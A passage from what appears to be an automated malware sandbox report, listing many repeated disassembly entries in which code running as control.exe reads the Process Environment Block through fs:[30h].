Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D3C691 mov eax, dword ptr fs:[00000030h]	4_2_04D3C691
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CC0680 mov eax, dword ptr fs:[00000030h]	4_2_04CC0680
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CC0680 mov eax, dword ptr fs:[00000030h]	4_2_04CC0680
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CC0680 mov eax, dword ptr fs:[00000030h]	4_2_04CC0680
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CC0680 mov eax, dword ptr fs:[00000030h]	4_2_04CC0680
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CC0680 mov eax, dword ptr fs:[00000030h]	4_2_04CC0680
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CC0680 mov eax, dword ptr fs:[00000030h]	4_2_04CC0680
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CC0680 mov eax, dword ptr fs:[00000030h]	4_2_04CC0680
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CC0680 mov eax, dword ptr fs:[00000030h]	4_2_04CC0680
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CC0680 mov eax, dword ptr fs:[00000030h]	4_2_04CC0680
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CC0680 mov eax, dword ptr fs:[00000030h]	4_2_04CC0680
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CC0680 mov eax, dword ptr fs:[00000030h]	4_2_04CC0680
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CC0680 mov eax, dword ptr fs:[00000030h]	4_2_04CC0680
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CB8690 mov eax, dword ptr fs:[00000030h]	4_2_04CB8690
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D786A8 mov eax, dword ptr fs:[00000030h]	4_2_04D786A8
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D786A8 mov eax, dword ptr fs:[00000030h]	4_2_04D786A8
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CEC640 mov eax, dword ptr fs:[00000030h]	4_2_04CEC640
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CEC640 mov eax, dword ptr fs:[00000030h]	4_2_04CEC640
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CE265C mov eax, dword ptr fs:[00000030h]	4_2_04CE265C
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CE265C mov ecx, dword ptr fs:[00000030h]	4_2_04CE265C
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CE265C mov eax, dword ptr fs:[00000030h]	4_2_04CE265C
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CE666D mov esi, dword ptr fs:[00000030h]	4_2_04CE666D
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CE666D mov eax, dword ptr fs:[00000030h]	4_2_04CE666D
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CE666D mov eax, dword ptr fs:[00000030h]	4_2_04CE666D
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D3E660 mov eax, dword ptr fs:[00000030h]	4_2_04D3E660
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CB0670 mov eax, dword ptr fs:[00000030h]	4_2_04CB0670
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CF2670 mov eax, dword ptr fs:[00000030h]	4_2_04CF2670
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CF2670 mov eax, dword ptr fs:[00000030h]	4_2_04CF2670
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D84600 mov eax, dword ptr fs:[00000030h]	4_2_04D84600
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D38633 mov esi, dword ptr fs:[00000030h]	4_2_04D38633
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D38633 mov eax, dword ptr fs:[00000030h]	4_2_04D38633
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D38633 mov eax, dword ptr fs:[00000030h]	4_2_04D38633
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CEC620 mov eax, dword ptr fs:[00000030h]	4_2_04CEC620
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CB0630 mov eax, dword ptr fs:[00000030h]	4_2_04CB0630
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CE0630 mov eax, dword ptr fs:[00000030h]	4_2_04CE0630
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CDE7E0 mov eax, dword ptr fs:[00000030h]	4_2_04CDE7E0
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D2E79D mov eax, dword ptr fs:[00000030h]	4_2_04D2E79D
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D2E79D mov eax, dword ptr fs:[00000030h]	4_2_04D2E79D
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D2E79D mov eax, dword ptr fs:[00000030h]	4_2_04D2E79D
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D2E79D mov eax, dword ptr fs:[00000030h]	4_2_04D2E79D
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D2E79D mov eax, dword ptr fs:[00000030h]	4_2_04D2E79D
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D2E79D mov eax, dword ptr fs:[00000030h]	4_2_04D2E79D
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D2E79D mov eax, dword ptr fs:[00000030h]	4_2_04D2E79D
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D2E79D mov eax, dword ptr fs:[00000030h]	4_2_04D2E79D
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D2E79D mov eax, dword ptr fs:[00000030h]	4_2_04D2E79D
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D4C7B0 mov eax, dword ptr fs:[00000030h]	4_2_04D4C7B0
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D4C7B0 mov eax, dword ptr fs:[00000030h]	4_2_04D4C7B0
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CB07A7 mov eax, dword ptr fs:[00000030h]	4_2_04CB07A7
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D5E750 mov eax, dword ptr fs:[00000030h]	4_2_04D5E750
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CD2755 mov eax, dword ptr fs:[00000030h]	4_2_04CD2755
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CD2755 mov eax, dword ptr fs:[00000030h]	4_2_04CD2755
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CD2755 mov eax, dword ptr fs:[00000030h]	4_2_04CD2755
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CD2755 mov ecx, dword ptr fs:[00000030h]	4_2_04CD2755
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CD2755 mov eax, dword ptr fs:[00000030h]	4_2_04CD2755
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CD2755 mov eax, dword ptr fs:[00000030h]	4_2_04CD2755
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CEA750 mov eax, dword ptr fs:[00000030h]	4_2_04CEA750
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CC2760 mov ecx, dword ptr fs:[00000030h]	4_2_04CC2760
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CB4779 mov eax, dword ptr fs:[00000030h]	4_2_04CB4779
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CB4779 mov eax, dword ptr fs:[00000030h]	4_2_04CB4779
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CE0774 mov eax, dword ptr fs:[00000030h]	4_2_04CE0774
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CD270D mov eax, dword ptr fs:[00000030h]	4_2_04CD270D
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CD270D mov eax, dword ptr fs:[00000030h]	4_2_04CD270D
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CD270D mov eax, dword ptr fs:[00000030h]	4_2_04CD270D
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CB471B mov eax, dword ptr fs:[00000030h]	4_2_04CB471B
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CB471B mov eax, dword ptr fs:[00000030h]	4_2_04CB471B
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D3C0E0 mov ecx, dword ptr fs:[00000030h]	4_2_04D3C0E0
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CAC0F6 mov eax, dword ptr fs:[00000030h]	4_2_04CAC0F6
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D46090 mov eax, dword ptr fs:[00000030h]	4_2_04D46090
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D84080 mov eax, dword ptr fs:[00000030h]	4_2_04D84080
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D84080 mov eax, dword ptr fs:[00000030h]	4_2_04D84080
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D84080 mov eax, dword ptr fs:[00000030h]	4_2_04D84080
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D84080 mov eax, dword ptr fs:[00000030h]	4_2_04D84080
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D84080 mov eax, dword ptr fs:[00000030h]	4_2_04D84080
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D84080 mov eax, dword ptr fs:[00000030h]	4_2_04D84080
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D84080 mov eax, dword ptr fs:[00000030h]	4_2_04D84080
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CAA093 mov ecx, dword ptr fs:[00000030h]	4_2_04CAA093
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CAC090 mov eax, dword ptr fs:[00000030h]	4_2_04CAC090
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CF00A5 mov eax, dword ptr fs:[00000030h]	4_2_04CF00A5
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D360A0 mov eax, dword ptr fs:[00000030h]	4_2_04D360A0
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D360A0 mov eax, dword ptr fs:[00000030h]	4_2_04D360A0
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D360A0 mov eax, dword ptr fs:[00000030h]	4_2_04D360A0
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D360A0 mov eax, dword ptr fs:[00000030h]	4_2_04D360A0
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D360A0 mov eax, dword ptr fs:[00000030h]	4_2_04D360A0
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D360A0 mov eax, dword ptr fs:[00000030h]	4_2_04D360A0
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D360A0 mov eax, dword ptr fs:[00000030h]	4_2_04D360A0
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CE0044 mov eax, dword ptr fs:[00000030h]	4_2_04CE0044
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D36040 mov eax, dword ptr fs:[00000030h]	4_2_04D36040
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CB6074 mov eax, dword ptr fs:[00000030h]	4_2_04CB6074
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CB6074 mov eax, dword ptr fs:[00000030h]	4_2_04CB6074
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CB8009 mov eax, dword ptr fs:[00000030h]	4_2_04CB8009
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CF2010 mov ecx, dword ptr fs:[00000030h]	4_2_04CF2010
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CC01C0 mov eax, dword ptr fs:[00000030h]	4_2_04CC01C0
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CC01C0 mov eax, dword ptr fs:[00000030h]	4_2_04CC01C0
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CA81EB mov eax, dword ptr fs:[00000030h]	4_2_04CA81EB
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CBA1E3 mov eax, dword ptr fs:[00000030h]	4_2_04CBA1E3
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CBA1E3 mov eax, dword ptr fs:[00000030h]	4_2_04CBA1E3
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CBA1E3 mov eax, dword ptr fs:[00000030h]	4_2_04CBA1E3
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CBA1E3 mov eax, dword ptr fs:[00000030h]	4_2_04CBA1E3
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CBA1E3 mov eax, dword ptr fs:[00000030h]	4_2_04CBA1E3
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D781EE mov eax, dword ptr fs:[00000030h]	4_2_04D781EE
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D781EE mov eax, dword ptr fs:[00000030h]	4_2_04D781EE
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CC01F1 mov eax, dword ptr fs:[00000030h]	4_2_04CC01F1
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CC01F1 mov eax, dword ptr fs:[00000030h]	4_2_04CC01F1
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CC01F1 mov eax, dword ptr fs:[00000030h]	4_2_04CC01F1
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CB4180 mov eax, dword ptr fs:[00000030h]	4_2_04CB4180
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CB4180 mov eax, dword ptr fs:[00000030h]	4_2_04CB4180
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CB4180 mov eax, dword ptr fs:[00000030h]	4_2_04CB4180
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CEE1A4 mov eax, dword ptr fs:[00000030h]	4_2_04CEE1A4
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CEE1A4 mov eax, dword ptr fs:[00000030h]	4_2_04CEE1A4
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CE41BB mov ecx, dword ptr fs:[00000030h]	4_2_04CE41BB
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CE41BB mov eax, dword ptr fs:[00000030h]	4_2_04CE41BB
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CE41BB mov eax, dword ptr fs:[00000030h]	4_2_04CE41BB
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CAA147 mov eax, dword ptr fs:[00000030h]	4_2_04CAA147
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CAA147 mov eax, dword ptr fs:[00000030h]	4_2_04CAA147
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CAA147 mov eax, dword ptr fs:[00000030h]	4_2_04CAA147
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CE415F mov eax, dword ptr fs:[00000030h]	4_2_04CE415F
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CB6179 mov eax, dword ptr fs:[00000030h]	4_2_04CB6179
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CE0118 mov eax, dword ptr fs:[00000030h]	4_2_04CE0118
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D3A130 mov eax, dword ptr fs:[00000030h]	4_2_04D3A130
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CBA2E0 mov eax, dword ptr fs:[00000030h]	4_2_04CBA2E0
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CBA2E0 mov eax, dword ptr fs:[00000030h]	4_2_04CBA2E0
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CBA2E0 mov eax, dword ptr fs:[00000030h]	4_2_04CBA2E0
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CBA2E0 mov eax, dword ptr fs:[00000030h]	4_2_04CBA2E0
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CBA2E0 mov eax, dword ptr fs:[00000030h]	4_2_04CBA2E0
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CBA2E0 mov eax, dword ptr fs:[00000030h]	4_2_04CBA2E0
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CB82E0 mov eax, dword ptr fs:[00000030h]	4_2_04CB82E0
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CB82E0 mov eax, dword ptr fs:[00000030h]	4_2_04CB82E0
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CB82E0 mov eax, dword ptr fs:[00000030h]	4_2_04CB82E0
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CB82E0 mov eax, dword ptr fs:[00000030h]	4_2_04CB82E0
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CC02F9 mov eax, dword ptr fs:[00000030h]	4_2_04CC02F9
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CC02F9 mov eax, dword ptr fs:[00000030h]	4_2_04CC02F9
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CC02F9 mov eax, dword ptr fs:[00000030h]	4_2_04CC02F9
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CC02F9 mov eax, dword ptr fs:[00000030h]	4_2_04CC02F9
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CC02F9 mov eax, dword ptr fs:[00000030h]	4_2_04CC02F9
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CC02F9 mov eax, dword ptr fs:[00000030h]	4_2_04CC02F9
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CC02F9 mov eax, dword ptr fs:[00000030h]	4_2_04CC02F9
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CC02F9 mov eax, dword ptr fs:[00000030h]	4_2_04CC02F9
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D2E289 mov eax, dword ptr fs:[00000030h]	4_2_04D2E289
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CD42AF mov eax, dword ptr fs:[00000030h]	4_2_04CD42AF
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CD42AF mov eax, dword ptr fs:[00000030h]	4_2_04CD42AF
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CAC2B0 mov ecx, dword ptr fs:[00000030h]	4_2_04CAC2B0
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CAA200 mov eax, dword ptr fs:[00000030h]	4_2_04CAA200
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CA821B mov eax, dword ptr fs:[00000030h]	4_2_04CA821B
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CEA22B mov eax, dword ptr fs:[00000030h]	4_2_04CEA22B
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CEA22B mov eax, dword ptr fs:[00000030h]	4_2_04CEA22B
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CEA22B mov eax, dword ptr fs:[00000030h]	4_2_04CEA22B
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D30227 mov eax, dword ptr fs:[00000030h]	4_2_04D30227
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D30227 mov eax, dword ptr fs:[00000030h]	4_2_04D30227
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D30227 mov eax, dword ptr fs:[00000030h]	4_2_04D30227
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CD0230 mov ecx, dword ptr fs:[00000030h]	4_2_04CD0230
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CB63CB mov eax, dword ptr fs:[00000030h]	4_2_04CB63CB
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D343D5 mov eax, dword ptr fs:[00000030h]	4_2_04D343D5
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CAE3C0 mov eax, dword ptr fs:[00000030h]	4_2_04CAE3C0
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CAE3C0 mov eax, dword ptr fs:[00000030h]	4_2_04CAE3C0
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CAE3C0 mov eax, dword ptr fs:[00000030h]	4_2_04CAE3C0
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CAC3C7 mov eax, dword ptr fs:[00000030h]	4_2_04CAC3C7
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D3E3DD mov eax, dword ptr fs:[00000030h]	4_2_04D3E3DD
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CE43D0 mov ecx, dword ptr fs:[00000030h]	4_2_04CE43D0
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CDA390 mov eax, dword ptr fs:[00000030h]	4_2_04CDA390
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CDA390 mov eax, dword ptr fs:[00000030h]	4_2_04CDA390
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CDA390 mov eax, dword ptr fs:[00000030h]	4_2_04CDA390
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D2C3B0 mov eax, dword ptr fs:[00000030h]	4_2_04D2C3B0
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CA8347 mov eax, dword ptr fs:[00000030h]	4_2_04CA8347
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CA8347 mov eax, dword ptr fs:[00000030h]	4_2_04CA8347
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CA8347 mov eax, dword ptr fs:[00000030h]	4_2_04CA8347
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CEA350 mov eax, dword ptr fs:[00000030h]	4_2_04CEA350
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D2E372 mov eax, dword ptr fs:[00000030h]	4_2_04D2E372
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D2E372 mov eax, dword ptr fs:[00000030h]	4_2_04D2E372
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D2E372 mov eax, dword ptr fs:[00000030h]	4_2_04D2E372
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D2E372 mov eax, dword ptr fs:[00000030h]	4_2_04D2E372
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D30371 mov eax, dword ptr fs:[00000030h]	4_2_04D30371
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D30371 mov eax, dword ptr fs:[00000030h]	4_2_04D30371
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CEE363 mov eax, dword ptr fs:[00000030h]	4_2_04CEE363
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CEE363 mov eax, dword ptr fs:[00000030h]	4_2_04CEE363
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CEE363 mov eax, dword ptr fs:[00000030h]	4_2_04CEE363
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CEE363 mov eax, dword ptr fs:[00000030h]	4_2_04CEE363
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CEE363 mov eax, dword ptr fs:[00000030h]	4_2_04CEE363
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CEE363 mov eax, dword ptr fs:[00000030h]	4_2_04CEE363
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CEE363 mov eax, dword ptr fs:[00000030h]	4_2_04CEE363
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CEE363 mov eax, dword ptr fs:[00000030h]	4_2_04CEE363
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CD237A mov eax, dword ptr fs:[00000030h]	4_2_04CD237A
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CE631F mov eax, dword ptr fs:[00000030h]	4_2_04CE631F
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CCE310 mov eax, dword ptr fs:[00000030h]	4_2_04CCE310
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CCE310 mov eax, dword ptr fs:[00000030h]	4_2_04CCE310
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CCE310 mov eax, dword ptr fs:[00000030h]	4_2_04CCE310
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CAE328 mov eax, dword ptr fs:[00000030h]	4_2_04CAE328
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CAE328 mov eax, dword ptr fs:[00000030h]	4_2_04CAE328
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CAE328 mov eax, dword ptr fs:[00000030h]	4_2_04CAE328
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CE8322 mov eax, dword ptr fs:[00000030h]	4_2_04CE8322
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CE8322 mov eax, dword ptr fs:[00000030h]	4_2_04CE8322
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CE8322 mov eax, dword ptr fs:[00000030h]	4_2_04CE8322
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D42CD0 mov eax, dword ptr fs:[00000030h]	4_2_04D42CD0
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D42CD0 mov eax, dword ptr fs:[00000030h]	4_2_04D42CD0
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D42CD0 mov eax, dword ptr fs:[00000030h]	4_2_04D42CD0
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CA6CC0 mov eax, dword ptr fs:[00000030h]	4_2_04CA6CC0
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CA6CC0 mov eax, dword ptr fs:[00000030h]	4_2_04CA6CC0
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CA6CC0 mov eax, dword ptr fs:[00000030h]	4_2_04CA6CC0
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D84CD2 mov eax, dword ptr fs:[00000030h]	4_2_04D84CD2
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CE6CC0 mov eax, dword ptr fs:[00000030h]	4_2_04CE6CC0
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CD8CDF mov eax, dword ptr fs:[00000030h]	4_2_04CD8CDF
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CD8CDF mov eax, dword ptr fs:[00000030h]	4_2_04CD8CDF
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CECCD1 mov ecx, dword ptr fs:[00000030h]	4_2_04CECCD1
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CECCD1 mov eax, dword ptr fs:[00000030h]	4_2_04CECCD1
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CECCD1 mov eax, dword ptr fs:[00000030h]	4_2_04CECCD1
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D2CCF0 mov ecx, dword ptr fs:[00000030h]	4_2_04D2CCF0
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D30CEE mov eax, dword ptr fs:[00000030h]	4_2_04D30CEE
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CDECF3 mov eax, dword ptr fs:[00000030h]	4_2_04CDECF3
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CDECF3 mov eax, dword ptr fs:[00000030h]	4_2_04CDECF3
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D84C59 mov eax, dword ptr fs:[00000030h]	4_2_04D84C59
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CACC68 mov eax, dword ptr fs:[00000030h]	4_2_04CACC68
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CB0C79 mov eax, dword ptr fs:[00000030h]	4_2_04CB0C79
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CB0C79 mov eax, dword ptr fs:[00000030h]	4_2_04CB0C79
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CB0C79 mov eax, dword ptr fs:[00000030h]	4_2_04CB0C79
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CB8C79 mov eax, dword ptr fs:[00000030h]	4_2_04CB8C79
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CB8C79 mov eax, dword ptr fs:[00000030h]	4_2_04CB8C79
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CB8C79 mov eax, dword ptr fs:[00000030h]	4_2_04CB8C79
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CB8C79 mov eax, dword ptr fs:[00000030h]	4_2_04CB8C79
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CB8C79 mov eax, dword ptr fs:[00000030h]	4_2_04CB8C79
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CE2C10 mov eax, dword ptr fs:[00000030h]	4_2_04CE2C10
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CE2C10 mov eax, dword ptr fs:[00000030h]	4_2_04CE2C10
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CE2C10 mov eax, dword ptr fs:[00000030h]	4_2_04CE2C10
